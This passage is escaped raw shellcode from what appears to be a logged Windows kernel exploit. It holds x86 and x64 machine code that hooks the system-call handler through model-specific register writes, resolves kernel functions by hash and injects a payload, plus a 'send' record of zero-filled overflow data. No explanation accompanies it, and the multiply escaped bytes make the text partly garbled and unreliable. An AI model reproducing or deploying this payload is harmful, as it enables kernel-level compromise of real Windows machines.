0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\